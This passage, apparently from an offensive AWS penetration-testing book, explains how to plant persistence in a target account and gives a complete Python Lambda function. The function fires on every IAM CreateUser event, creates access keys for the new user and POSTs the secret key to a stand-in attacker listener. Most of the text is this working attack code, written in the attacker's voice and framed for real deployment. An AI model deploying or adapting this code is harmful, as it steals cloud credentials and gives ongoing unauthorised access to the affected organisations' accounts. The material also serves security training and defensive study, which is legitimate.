Automating credential exfiltration with Lambda

Starting with the first point in the previous section, we want a Lambda function to trigger on an event that is worth exploiting. We will tie this into the persistence methods described earlier in this chapter: for backdooring IAM users, the event worth exploiting is a new IAM user being created. We can trigger our Lambda function on that event (with CloudWatch Events), and the function then runs code that automatically adds a new set of access keys to that user and exfiltrates those credentials to a server we specify.

This scenario ties together like this:

  1. The attacker (us) creates a malicious Lambda function in a target account
  2. The attacker creates a trigger to run the Lambda function every time a new IAM user is created
  3. The attacker sets up a listener on a server that they control, which will wait for credentials
  4. Two days pass
  5. A regular user in the environment creates a new IAM user
  6. The attacker's Lambda function is triggered
  7. The function adds a set of access keys to the newly created user
  8. The function makes an HTTP request to the attacker's server with the credentials that were created

Now the attacker just sits back and waits for credentials to flow into their server.

It may seem like a complicated process, but in the simplest terms, you can think of it as persistence for your persistence. We already understand how to establish persistence once (backdoor a user with an extra set of keys), so all Lambda adds to the equation is the ability to do it continuously, every time the triggering event occurs in the account.

For an event, such as a user being created, to trigger our function, a CloudWatch Events rule must be created. A CloudWatch Events rule is basically a way of saying: when I see this happen in the environment, perform this action. For our rule to fire, we also need CloudTrail logging enabled in the us-east-1 region. This is because we are triggering on an IAM API call (iam:CreateUser), and IAM is a global service: CloudTrail-sourced events for global services are only delivered to CloudWatch Events in us-east-1, so the rule must live there and a trail that records management events must cover that region (a multi-region trail does). In most situations, CloudTrail logging will be enabled. It is best practice to enable it across all AWS regions, and if CloudTrail isn't enabled, then you are likely in a less-polished environment where there are other problems to focus on first.
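The rule pattern and the Lambda function for the eight-step scenario above, as an added example that is not the book's code. The event pattern is what the CloudWatch Events rule (step 2) would be created with; `matches_pattern` mirrors how the service matches it; `handler` is the Lambda entry point for steps 6 to 8. The listener URL `EXFIL_URL`, the user name, the account ID and the access key in the sample are all constructed placeholders, and the IAM client and HTTP sender are injectable so the logic can be run offline without an AWS account:

```python
"""Added example (not the book's code): CloudWatch Events rule pattern plus the
Lambda handler that backdoors a newly created IAM user and ships the keys out.
EXFIL_URL and every value in SAMPLE_EVENT are constructed placeholders."""
import json
import urllib.request

# Event pattern for the CloudWatch Events rule (step 2): only IAM CreateUser
# calls recorded by CloudTrail match. This dict is what you would hand to
# put_rule as the rule's EventPattern (JSON-encoded).
EVENT_PATTERN = {
    "source": ["aws.iam"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {"eventSource": ["iam.amazonaws.com"], "eventName": ["CreateUser"]},
}

# Assumed attacker listener (step 3); placeholder host, not a real endpoint.
EXFIL_URL = "https://attacker.example/collect"


def matches_pattern(event, pattern=EVENT_PATTERN):
    """Reproduce CloudWatch Events matching for this pattern shape: every key in
    the pattern must exist in the event, a list means 'any of these exact
    values', and a nested dict recurses into the nested object."""
    for key, allowed in pattern.items():
        if key not in event:
            return False
        if isinstance(allowed, dict):
            if not isinstance(event[key], dict) or not matches_pattern(event[key], allowed):
                return False
        elif event[key] not in allowed:
            return False
    return True


def target_user(event):
    """The new user's name sits in the CloudTrail record's requestParameters."""
    return event["detail"]["requestParameters"]["userName"]


def exfiltrate(payload, url=EXFIL_URL):
    """Step 8: POST the new credentials as JSON to the attacker's listener."""
    req = urllib.request.Request(
        url, data=json.dumps(payload).encode(), headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


def handler(event, context=None, iam=None, send=exfiltrate):
    """Lambda entry point (steps 6-8). `iam` and `send` default to the real
    boto3 client and HTTP POST inside Lambda; tests inject fakes instead."""
    if not matches_pattern(event):
        return {"skipped": event.get("detail", {}).get("eventName")}
    if iam is None:
        import boto3  # boto3 is preinstalled in the Lambda runtime
        iam = boto3.client("iam")
    user = target_user(event)
    key = iam.create_access_key(UserName=user)["AccessKey"]  # step 7
    payload = {
        "account": event["account"],
        "user": user,
        "AccessKeyId": key["AccessKeyId"],
        "SecretAccessKey": key["SecretAccessKey"],
    }
    send(payload)
    return {"user": user, "key_id": key["AccessKeyId"]}


# Constructed sample of the envelope CloudWatch Events delivers for an IAM
# CreateUser call (abbreviated CloudTrail record in "detail"); not captured
# from a real account.
SAMPLE_EVENT = {
    "version": "0",
    "source": "aws.iam",
    "account": "123456789012",
    "region": "us-east-1",
    "detail-type": "AWS API Call via CloudTrail",
    "detail": {
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateUser",
        "awsRegion": "us-east-1",
        "requestParameters": {"userName": "new-dev-user"},
        "responseElements": {"user": {"userName": "new-dev-user"}},
    },
}


class FakeIAM:
    """Offline stand-in for boto3's IAM client; returns a fixed, fake key."""
    def create_access_key(self, UserName):
        return {"AccessKey": {"UserName": UserName, "AccessKeyId": "AKIAEXAMPLE0000000001",
                              "SecretAccessKey": "fake/secret/for/demo", "Status": "Active"}}


def dry_run(event=SAMPLE_EVENT):
    """Run the handler end to end with no AWS and no network: captures what
    would have been POSTed to the listener instead of sending it."""
    sent = []
    result = handler(event, iam=FakeIAM(), send=sent.append)
    return result, sent


if __name__ == "__main__":
    print(dry_run())
```

Two details matter for the real deployment. First, the Lambda execution role needs `iam:CreateAccessKey`, and that CreateAccessKey call is itself recorded by CloudTrail with the function's role as the principal, which is exactly the trail a defender would pull on. Second, `create_access_key` fails once a user already holds two keys, so the handler will raise on users pre-created with keys; the return value is only reached on success.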
